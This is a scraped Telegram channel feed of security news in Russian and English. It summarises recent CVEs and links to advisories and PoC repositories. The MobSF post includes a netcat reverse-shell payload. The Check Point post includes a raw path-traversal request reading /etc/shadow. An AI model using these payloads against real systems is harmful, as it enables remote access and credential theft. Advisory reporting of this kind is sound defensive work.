SecuriXy.kz
1.22K subscribers
394 photos
13 videos
11 files
293 links
Все самое интересное из мира информ. безопасности и IT 👍🏻
Обсуждаем, делимся, умнеем
https://securixy.kz
Обратная связь - @feedback_securixy_bot
Download Telegram
https://patchapalooza.com

Удобный сервис от Alexander Hagenah по виндовым апдейтам и другим продуктам мелкомягких... Есть Rest API для удобства встраивания в свои продукты мониторинга
#CVE #Microsoft
Очень удобный скрипт по поиску описания уязвимости и публичных сплоитов к ним...

https://github.com/xaitax/SploitScan?tab=readme-ov-file

#CVE #Sploitscan #Toolkits
#CVE-2023-22527 #RCE (Remote Code Execution) Vulnerability In #Confluence Data Center and Confluence Server with #CVSS v3: 10/10

Severity:
Atlassian rates the severity level of this vulnerability as critical (10.0 with the following vector CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) per our internal assessment.
This is our assessment, and you should evaluate its applicability to your own IT environment.

Affected Versions:
This RCE (Remote Code Execution) vulnerability affects out-of-date Confluence Data Center and Server 8 versions released before Dec. 5, 2023 as well as 8.4.5 which no longer receives backported fixes in accordance with our Security Bug Fix Policy. Atlassian recommends patching to the latest version.

Note: 7.19.x LTS versions are not affected by this vulnerability

Product
Confluence Data Center and Server

Affected Versions
8.0.x
8.1.x
8.2.x
8.3.x
8.4.x
8.5.0-8.5.3

https://www.opencve.io/cve/CVE-2023-22527

https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html

PoC: https://github.com/cleverg0d/CVE-2023-22527/tree/main
Apache Tomcat HTTP Request Smuggling (Client-Side Desync)

Recently, a critical vulnerability was discovered in Apache Tomcat, which was assigned the code CVE-2024-21733

https://hackerone.com/reports/2327341

Vulnerable:
from 8.5.7 through 8.5.63
from 9.0.0-M11 through 9.0.43


Patched: 8.5.64 and 9.0.44

#CVE #Tomcat
Для не любителей обновлять OS Linux печальная новость...

Новая #LPE уязвимость #CVE-2023-6246 в библиотеке GNU C (glibc) в функции __vsyslog_internal обнаружено переполнение буфера, основанное на куче. Эта функция вызывается функциями syslog и vsyslog. Проблема возникает, если функция openlog не была вызвана или была вызвана с аргументом ident, установленным в NULL, а имя программы (basename из argv[0]) больше 1024 байт, что приводит к аварийному завершению работы приложения или локальному повышению привилегий.

Published: 2024-01-31
Base Score: 8.4
Base Severity: HIGH

Vulnerable: glibc 2.36 >
Debian 12 и 13, Ubuntu 23.04 и 23.10, Fedora 37 до 39 были уязвимы для эксплуатации на дефолтных настройках.

Если у Вас в конторе Qualys, чекнуть хосты можно
```
vulnerabilities.vulnerability.cveIds:CVE-2023-6246
```

https://blog.qualys.com/vulnerabilities-threat-research/2024/01/30/qualys-tru-discovers-important-vulnerabilities-in-gnu-c-librarys-syslog
#CVE-2024-21633 - #MobSF Remote code execution (#RCE)

MobSF - статический анализатор приложений: Android, Apple iOS и Windows Phone и динамический анализ: только приложения Android.

Пересобрав приложение с ночинкой в res/raw/jadx к примерутакого содержания:


#!/bin/bash
nc host.docker.internal 9001 -e sh

Можно получить реверс шелл с хоста на котором стоит анализатор, из-за фичи самого MobSF который позволяет записать что угодно по относительному пути ${decode target path}/res/

https://www.qu35t.pw/posts/2024-21633-mobsf-rce/

https://github.com/0x33c0unt/CVE-2024-21633
В последнем официальном патче #Oracle от января 2024 г была исправлена #RCE уязвимость, основанная на протоколе #Weblogic T3\IIOP #CVE-2024-20931. Уязвимость была представлена в Oracle автором в октябре 2023 года и относится к обходу патча CVE-2023-21839, что влечет за собой новую поверхность атаки для #JNDI.

Описание пока скудное, но думаем скоро появятся статьи с разбором.

https://github.com/GlassyAmadeus/CVE-2024-20931
Новая уязвимость #CVE-2024-21378 в Microsoft Outlook, которая позволяет удаленно выполнять код RCE (Remote Code Execution) aka #Ruller2.

Описание уязвимости:
* Уязвимость возникает из-за недостаточной проверки входных данных в Microsoft Outlook.
* Злоумышленник может отправить специально сформированное электронное письмо, содержащее вредоносный код.
* При открытии письма пользователем, вредоносный код будет выполнен на компьютере.

Потенциальные последствия:
* Злоумышленник может получить удаленный доступ к компьютеру пользователя.
* Это может привести к утечке конфиденциальных данных, установке вредоносного ПО и другим негативным последствиям.

Рекомендации:
* Обновите Microsoft Outlook до последней версии.
* Будьте осторожны при открытии электронных писем, особенно если они содержат вложения или ссылки.

https://www.netspi.com/blog/technical/red-team-operations/microsoft-outlook-remote-code-execution-cve-2024-21378/
🔍 CVE ID: #CVE-2024-20767

Adobe #ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.

Published: 2024-03-18
Base Score: 8.2
Base Severity: HIGH

PoC: https://tttttt.me/proxy_bar/1958
#CVE-2024-3400 OS Command Injection Vulnerability in GlobalProtect Gateway PAN-OS #PaloAlto

https://security.paloaltonetworks.com/CVE-2024-3400

IOC: https://unit42.paloaltonetworks.com/cve-2024-3400/
Check Point выпустила экстренное исправление для VPN нулевого дня, используемой в атаках #CVE-2024-24919 CVSS 3.X 7.5

https://vulmon.com/vulnerabilitydetails?qid=CVE-2024-24919

https://nvd.nist.gov/vuln/detail/CVE-2024-24919

https://www.bleepingcomputer.com/news/security/check-point-releases-emergency-fix-for-vpn-zero-day-exploited-in-attacks/

Check Point Remote Access VPN 0-Day
FOFA link
POC:

POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow